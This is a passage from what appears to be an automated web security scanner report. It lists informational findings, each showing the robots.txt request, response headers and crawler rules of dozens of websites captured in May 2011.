Content-Type: text/plain; charset=UTF-8
Content-Length: 75
Vary: Accept-Encoding
Connection: close

User-agent: *
Disallow:
Sitemap: http://lutherauto.com/sitemap_index.xml

27.1033. http://www.lxforums.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lxforums.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lxforums.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:50:26 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
Last-Modified: Wed, 24 Sep 2008 11:32:03 GMT
ETag: "1758004-42b-457a2a21d72c0"
Accept-Ranges: bytes
Content-Length: 1067
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /forums/ajax.php
Disallow: /forums/attachment.php
Disallow: /forums/calendar.php
Disallow: /forums/cron.php
Disallow: /forums/editpost.php
Disallow: /forums/global.php
D
...[SNIP]...

27.1034. http://www.lyngsat-address.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lyngsat-address.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lyngsat-address.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:04:12 GMT
Server: Apache/2.2.15 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

User-agent: Mediapartners-Google*
Disallow:

27.1035. http://www.lyricinterpretations.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lyricinterpretations.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lyricinterpretations.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:19:13 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Fri, 24 Dec 2010 21:05:47 GMT
ETag: "10a83-f4-4982e59a8e0c0"
Accept-Ranges: bytes
Content-Length: 244
Cache-Control: max-age=0
Expires: Wed, 04 May 2011 01:19:13 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /reports/*
Disallow: /notifications/*
Disallow: /lyrics/*
Disallow: /clickheat/*
Disallow: /interps/submit/*
Disallow: /categories/suggest
Disallow: /categories/suggest/*
Disal
...[SNIP]...

27.1036. http://www.lzudzgu.tk/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lzudzgu.tk
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lzudzgu.tk

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 01:11:24 GMT
Server: Resin/2.1.17
ETag: "AAAAS9Sxpow"
Last-Modified: Thu, 14 Apr 2011 06:50:38 GMT
Content-Type: text/plain
Content-Length: 67
Connection: close

# Robots.txt file for TK sites
#
User-agent: *
Disallow: /tikilink

27.1037. http://www.m-ms.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.m-ms.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.m-ms.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.58 (Unix) DAV/2 mod_perl/2.0.0 Perl/v5.8.4
Last-Modified: Thu, 15 Oct 2009 20:19:44 GMT
ETag: "5b03e-3f-b800"
Accept-Ranges: bytes
Content-Length: 63
Content-Type: text/plain; charset=ISO-8859-1
Date: Wed, 04 May 2011 04:01:45 GMT
Connection: close

User-agent: *
Disallow: /us/g2/anniversary/
Disallow: /admin

27.1038. http://www.m4carbine.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.m4carbine.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.m4carbine.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:22:08 GMT
Server: Apache/2.0.52 (CentOS)
Last-Modified: Thu, 13 Jul 2006 16:49:47 GMT
ETag: "f7803e-2db-5a0180c0"
Accept-Ranges: bytes
Content-Length: 731
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /admincp/
Disallow: /modcp/
Disallow: /images/
Disallow: /includes/
Disallow: /install/
Disallow: /cpstyle/
Disallow: /avatar.php
Disallow: /cron.php
Disallow: /editpost.php
Di
...[SNIP]...

27.1039. http://www.madamateurs.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.madamateurs.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.madamateurs.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:44:19 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.6 mod_ssl/2.8.31 OpenSSL/0.9.8c
Last-Modified: Sat, 17 Jul 2010 05:06:24 GMT
ETag: "2598106-68-4c413a50"
Accept-Ranges: bytes
Content-Length: 104
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /porn/
Disallow: /image/
Disallow: /style/
Disallow: /crtr/

27.1040. http://www.madisonchildrensmuseum.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.madisonchildrensmuseum.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.madisonchildrensmuseum.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:58:53 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny10
X-Pingback: http://www.madisonchildrensmuseum.org/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

27.1041. http://www.magellans.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magellans.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.magellans.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:23:36 GMT
Server: Apache
Last-Modified: Tue, 21 Sep 2010 20:08:26 GMT
ETag: "dc-4c9910ba"
Accept-Ranges: bytes
Content-Length: 220
Connection: close
Content-Type: text/plain

Sitemap: http://www.magellans.com/sitemap.xml
Sitemap: http://www.magellans.com/videoSitemap.xml
User-agent: *
Disallow: /*refprod
Disallow: /*refchan
Disallow: /*cgi.bin
Disallow: /*Partner_ID
Disall
...[SNIP]...

27.1042. http://www.maggiescrochet.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.maggiescrochet.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.maggiescrochet.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:38:52 GMT
Server: Apache
Last-Modified: Fri, 29 Oct 2010 20:01:38 GMT
ETag: "1c3413b-53-493c6ed20cc80"
Accept-Ranges: bytes
Content-Length: 83
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
Disallow:

User-Agent: *
Allow: /
Disallow: /pos/

27.1043. http://www.magicx345.tk/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magicx345.tk
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.magicx345.tk

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 01:53:31 GMT
Server: Resin/2.1.17
ETag: "AAAAS9Sxpow"
Last-Modified: Thu, 14 Apr 2011 06:50:38 GMT
Content-Type: text/plain
Content-Length: 67
Connection: close

# Robots.txt file for TK sites
#
User-agent: *
Disallow: /tikilink

27.1044. http://www.mailermailer.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mailermailer.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mailermailer.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:42:18 GMT
Server: Apache/2.2.17 (FreeBSD)
Last-Modified: Fri, 11 Mar 2011 16:34:05 GMT
Accept-Ranges: bytes
Content-Length: 533
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain
X-Pad: avoid browser bug

User-agent: Slurp
Disallow: /manage/
Disallow: /control/
Disallow: /c?
Disallow: /rd?
Disallow: /o?
Disallow: /c$
Disallow: /rd$
Disallow: /o$

User-agent: msnbot
Disallow: /manage/
Disallow: /control
...[SNIP]...

27.1045. http://www.makeuptalk.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.makeuptalk.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.makeuptalk.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 01:35:38 GMT
Content-Type: text/plain;charset=utf-8
Connection: close
X-Powered-By: PHP/5.2.13
Content-Length: 143
X-Varnish: 1121898200
Age: 0
Via: 1.1 varnish
X-Served-By: varnish001.huddler.com
X-Cache: MISS
P3P: policyref="http://www.huddler.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"

User-agent: *
Disallow: /apis/
Disallow: /-api-
Disallow: /search.php
Disallow: /p.php
Sitemap: http://www.makeuptalk.com/site_map_index.xml.gz

27.1046. http://www.maleextra.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.maleextra.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.maleextra.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:44:15 GMT
Server: Apache
Last-Modified: Wed, 24 Nov 2010 13:34:00 GMT
ETag: "3695304-1c0-495cc8ab7a200"
Accept-Ranges: bytes
Content-Length: 448
Connection: close
Content-Type: text/plain; charset=UTF-8

sitemap:http://www.maleextra.com/sitemap.xml

User-agent: *
Disallow:/penis-enlargement.php
Disallow:/index_ppc.php
Disallow:/enhancement_ppc.php
Disallow:/bonuses_ppc.php
Disallow:/ingredients_ppc.ph
...[SNIP]...

27.1047. http://www.malemodel.us/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.malemodel.us
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.malemodel.us

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain; charset=UTF-8
Date: Wed, 04 May 2011 04:01:40 GMT
Accept-Ranges: bytes
Connection: close
Set-Cookie: X-Mapping-mkmfjdci=597DEDD6C87019F7455DBFDA3E40CD3B; path=/
Last-Modified: Tue, 03 May 2011 15:27:53 GMT
X-Powered-By: W3 Total Cache/0.9.1.3
Content-Length: 211

User-agent: Googlebot
Allow: /cache/*
Allow: /uploaded/*
Allow: /wp-content/*
Allow: /wp-content/uploads/*

User-agent: Googlebot-Image
Allow: /*

Sitemap: http://www.malemodel.us/sitemap.xm
...[SNIP]...

27.1048. http://www.mandy.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mandy.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mandy.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:01:01 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 19 Nov 2010 17:00:00 GMT
ETag: "13b0eea-138-d6396400"
Accept-Ranges: bytes
Content-Length: 312
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /1/banclick.cfm
Disallow: /1/banside.cfm
Disallow: /1/bansideglob.cfm
Disallow: /1/bantop.cfm
Disallow: /1/bantopglob.cfm
Disallow: /1/editme.cfm
Disallow: /1/cast2.cfm
Disallo
...[SNIP]...

27.1049. http://www.manythings.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manythings.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.manythings.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:01:15 GMT
Server: Apache
Last-Modified: Tue, 09 Jun 2009 08:42:06 GMT
ETag: "16cd8536-116e-46be655625380"
Accept-Ranges: bytes
Content-Length: 4462
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: Alexibot Disallow: / User-agent: asterias Disallow: / User-agent: BackDoorBot/1.0 Disallow: / User-Agent: Black Hole Disallow: / User-agent: BlowFish/1.0 Disallow: / User-agent: BotALot Di
...[SNIP]...

27.1050. http://www.maploco.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.maploco.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.maploco.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:54:10 GMT
Server: Apache/2.2.17 (EL)
Last-Modified: Thu, 18 Nov 2010 08:13:38 GMT
ETag: "5854f5-34-4954f5df2f080"
Accept-Ranges: bytes
Content-Length: 52
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8


User-Agent: *
Crawl-Delay: 10
Disallow: /vmap/

27.1051. http://www.marcandangel.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marcandangel.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.marcandangel.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:14:23 GMT
Server: Apache
Last-Modified: Thu, 24 May 2007 20:24:58 GMT
Accept-Ranges: bytes
Content-Length: 164
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /wp-content/
Disallow: /wp-admin/
Disallow: /wp-includes/
Disallow: /wp-
Disallow: /feed/
Disallow: /trackback/
Disallow: /cgi-bin/

27.1052. http://www.marinas.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marinas.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.marinas.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:21:39 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 10 Mar 2010 21:08:26 GMT
ETag: "d4b10e9-163-48178b2ffa680"
Accept-Ranges: bytes
Content-Length: 355
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /awstats/
Disallow: /control_panel/
Disallow: /help/
Disallow: /pda/
Disallow: /purchase_photo/
Disallow: /tests/
Disallow: /sys/
Disallow: /apis/
Disallow: /search/

...[SNIP]...

27.1053. http://www.marketfolly.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marketfolly.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.marketfolly.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain; charset=UTF-8
Expires: Wed, 04 May 2011 21:18:09 GMT
Date: Tue, 03 May 2011 21:18:09 GMT
Last-Modified: Tue, 03 May 2011 18:26:11 GMT
ETag: "6fb9ff15-63ef-4099-8deb-6a2aa6eb92cf"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400, proxy-revalidate, must-revalidate
Age: 19024

User-agent: Mediapartners-Google
Disallow:

User-agent: *
Disallow: /search
Disallow: /related-content.g
Disallow: /related_content_helper.html

Sitemap: http://www.marketfolly.com/feeds/posts/defaul
...[SNIP]...

27.1054. http://www.marlincrawler.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marlincrawler.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.marlincrawler.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:52:23 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.16
Last-Modified: Thu, 28 Apr 2011 17:52:40 GMT
ETag: "1f4126a-675-4a1fe392f2a00"
Accept-Ranges: bytes
Content-Length: 1653
Cache-Control: max-age=1209600
Expires: Wed, 18 May 2011 03:52:23 GMT
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.1055. http://www.marriottvacationclub.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marriottvacationclub.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.marriottvacationclub.com

Response

HTTP/1.0 200 OK
Content-Length: 502
Content-Type: text/plain
Last-Modified: Wed, 12 Jan 2011 20:11:27 GMT
Accept-Ranges: bytes
ETag: "c0551de594b2cb1:2649"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:03:56 GMT
Connection: close
Via: 1.1 mcoatprdslb2 (Juniper Networks Application Acceleration Platform - DX 5.3.2 0)
Set-Cookie: rl-sticky-key=0ace8f9d; path=/; expires=Wed, 04 May 2011 01:08:58 GMT

# robots.txt for http://www.marriottvacationclub.com

User-agent: *
Disallow: /aboutus/
Disallow: /ajax/
Disallow: /common/
Disallow: /contact-us/
Disallow: /content/
Disallow: /errors/
Disal
...[SNIP]...

27.1056. http://www.marshu.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marshu.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.marshu.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:41:57 GMT
Server: Apache
Last-Modified: Sun, 20 Feb 2011 15:00:47 GMT
ETag: "2837d6-70-4d612c9f"
Accept-Ranges: bytes
Content-Length: 112
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /stats/
Disallow: /statshistory/
Disallow: /images/
Disallow: /gallery/
Disallow: /cgi/

27.1057. http://www.marxists.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marxists.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.marxists.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:45:24 GMT
Server: Apache
Last-Modified: Tue, 24 Aug 2010 00:32:00 GMT
ETag: "338002-1c5-48e86e4aac000"
Accept-Ranges: bytes
Content-Length: 453
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /admin/ # skip cd images directory
Disallow: /cd/ # skip cd images directory
Disallow: /css/ # skip root css directory
Disallow: /webstats/ # not reliable
Disallow: /espanol/ad
...[SNIP]...

27.1058. http://www.mashceleb.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mashceleb.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mashceleb.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 May 2011 03:35:18 GMT
Content-Type: text/plain; charset=UTF-8
Connection: close
Last-Modified: Sun, 30 Jan 2011 14:23:34 GMT
Accept-Ranges: bytes
Content-Length: 426
Cache-Control: max-age=86400
Expires: Thu, 05 May 2011 03:34:54 GMT
Vary: Accept-Encoding

Sitemap: http://www.mashceleb.com/sitemap.xml

User-agent: *
Disallow: */trackback*
Disallow: */comment-page*
Disallow: /*.js
Disallow: /*.php
Disallow: /*.css
Disallow: /go/
Disallow: /login
...[SNIP]...

27.1059. http://www.mataf.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mataf.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mataf.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:40:21 GMT
Server: Apache/2
Last-Modified: Mon, 24 Jan 2011 06:54:28 GMT
ETag: "23a131-32-49a921231d100"
Accept-Ranges: bytes
Content-Length: 50
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /cache/
Disallow: /script/

27.1060. http://www.mbendi.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mbendi.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mbendi.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:02:36 GMT
Server: Microsoft-IIS/6.0
Cache-Control: max-age=3600
Content-Length: 3887
Content-Type: text/plain
Last-Modified: Wed, 10 Nov 2010 08:20:23 GMT
Accept-Ranges: bytes
ETag: "71b5331fb080cb1:547"
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
X-Powered-By: ASP.NET
Age: 536
X-Cache: HIT from abacus.netopti.net
X-Cache-Lookup: HIT from abacus.netopti.net:8085
Via: 1.0 abacus.netopti.net:8085 (squid/2.6.STABLE14)
Connection: close

User-agent: MSNbot
Disallow: /help/
Disallow: /a_sndmsg/
Allow: /a_sndmsg/bspace_menu.asp
Allow: /a_sndmsg/busop_menu.asp
Allow: /a_sndmsg/contact.asp
Allow: /a_sndmsg/country
Allow: /a_sndmsg/
...[SNIP]...

27.1061. http://www.mclennan.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mclennan.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mclennan.edu

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:13:10 GMT
Server: Apache
Last-Modified: Thu, 20 Jan 2011 16:04:22 GMT
Accept-Ranges: bytes
Content-Length: 115
Vary: Accept-Encoding
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform
Pragma: no-cache
Content-Type: text/plain
Connection: close

User-agent: *
Disallow: /

User-agent: Googlebot
Allow: /

User-agent: Slurp
Allow: /

User-Agent: msnbot
Allow: /

27.1062. http://www.mctennessee.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mctennessee.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mctennessee.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:09:49 GMT
Server: Apache
Last-Modified: Tue, 18 Dec 2007 11:39:30 GMT
ETag: "e2c513-2e-4418dfb59c080"
Accept-Ranges: bytes
Content-Length: 46
Connection: close
Content-Type: text/plain; charset=UTF-8
Set-Cookie: BIGipServerPOOL_74.205.90.114=4191858954.20480.0000; path=/

User-agent: *
Disallow: /careers/apply-online/

27.1063. http://www.meaningfulbeauty.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.meaningfulbeauty.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.meaningfulbeauty.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:08:35 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 15 Oct 2010 18:16:34 GMT
Accept-Ranges: bytes
Content-Length: 105
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8
Set-Cookie: Coyote-2-a0a643c=a0a6515:0; path=/

User-agent: *
Disallow: /includes/
Disallow: /css/
Disallow: /images/
Disallow: /omniture/
Dissalow: /js/

27.1064. http://www.mediaoutrage.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediaoutrage.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mediaoutrage.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:45:24 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
X-Pingback: http://mediaoutrage.com/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

27.1065. http://www.mediav.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediav.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mediav.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:56:25 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 15 Apr 2011 06:33:37 GMT
ETag: "3df90-a5-4a0ef38c67240"
Accept-Ranges: bytes
Content-Length: 165
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /images/
Disallow: /flash/
Disallow: /Scripts/
Disallow: /Templates/
Disallow: /index_20090916.htm
Disallow: /default.css
Allow: /


27.1066. http://www.mediawiki.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediawiki.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mediawiki.org

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 02:59:23 GMT
Server: Apache
Cache-Control: s-maxage=3600, must-revalidate, max-age=0
X-Article-ID: 0
X-Language: mediawiki
X-Site: wikipedia
Last-Modified: Sat, 18 Apr 2009 13:54:29 GMT
Content-Length: 16243
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
Age: 160
X-Cache: HIT from sq76.wikimedia.org
X-Cache-Lookup: HIT from sq76.wikimedia.org:3128
X-Cache: MISS from sq59.wikimedia.org
X-Cache-Lookup: MISS from sq59.wikimedia.org:80
Connection: close

#
# robots.txt for http://www.wikipedia.org/ and friends
#
# Please note: There are a lot of pages on this site, and there are
# some misbehaved spiders out there that go _way_ too fast. If you're
# i
...[SNIP]...

27.1067. http://www.medicalnow.info/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.medicalnow.info
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.medicalnow.info

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:13:34 GMT
Server: Apache
Last-Modified: Mon, 03 Jan 2011 16:42:03 GMT
ETag: "594c48-28-498f3d4e38cc0"
Accept-Ranges: bytes
Content-Length: 40
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow:
Crawl-delay: 10

27.1068. http://www.meendo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.meendo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.meendo.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 04 May 2011 02:00:08 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
Last-Modified: Tue, 25 Aug 2009 14:00:52 GMT
ETag: "203987-20-4a93ee94"
Accept-Ranges: bytes
Content-Length: 32

User-agent: *
Disallow: /images

27.1069. http://www.meetthadealer.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.meetthadealer.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.meetthadealer.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:05:05 GMT
Server: Apache
Last-Modified: Mon, 21 Dec 2009 20:27:32 GMT
Accept-Ranges: bytes
Content-Length: 25
Vary: Accept-Encoding,User-Agent
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /

27.1070. http://www.melrosejewelers.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.melrosejewelers.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.melrosejewelers.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:39:16 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 24 Jun 2010 09:04:55 GMT
ETag: "9c61998-53-f2ae1bc0"
Accept-Ranges: bytes
Content-Length: 83
Connection: close
Content-Type: text/plain

# robots.txt for http://www.melrosejewelers.com

User-agent: *
Disallow: /admin/

27.1071. http://www.memeorandum.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.memeorandum.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.memeorandum.com

Response

